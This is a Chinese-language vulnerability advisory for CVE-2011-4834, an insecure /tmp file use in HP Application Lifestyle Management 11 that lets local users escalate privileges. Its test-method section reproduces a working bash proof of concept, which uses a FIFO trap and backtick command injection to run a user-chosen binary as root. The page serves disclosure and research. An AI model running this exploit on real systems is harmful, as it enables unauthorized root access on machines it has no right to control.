HP Application Lifestyle Management "GetInstalledPackages"本地权限提升漏洞
发布日期:2011-12-16
更新日期:2011-12-19
受影响系统:HP Application Lifestyle Management 11
描述:
BUGTRAQ ID:
50982
CVE ID:
CVE-2011-4834
HP Application Lifestyle Management 是应用软件管理解决方案。
HP Application Lifestyle Management在实现上存在本地权限提升漏洞,本地攻击者可利用此漏洞以提升的权限执行任意代码。
在升级或卸载HP ALM时会调用配置工具中的变量函数GetInstalledPackages,AIX、HP-UX和Solaris版本使用/tmp/tmp.txt的方式不安全。
<*来源:0a29406d9794e4f9b30b3c5d6702c708
链接:
http://seclists.org/fulldisclosure/2011/Dec/231
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://www.securityfocus.com/data/vulnerabilities/exploits/50982.sh
#!/bin/bash
# Simple PoC : Run as user, when vulnerable function is called
# /home/user/binary_to_run_as_root is run as root.
cat > file << EOF
Child Components
0a29406d9794e4f9b30b3c5d6702c708
\`/home/user/binary_to_run_as_root\`
EOF
mkfifo /tmp/tmp.txt # set trap
cat /tmp/tmp.txt # blocks for victim
while [ -e /tmp/tmp.txt ]; do
cat file > /tmp/tmp.txt
sleep 2
done
rm file
--
建议:
厂商补丁:
HP
--
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://itrc.hp.com浏览次数:2611
严重程度:0(网友投票)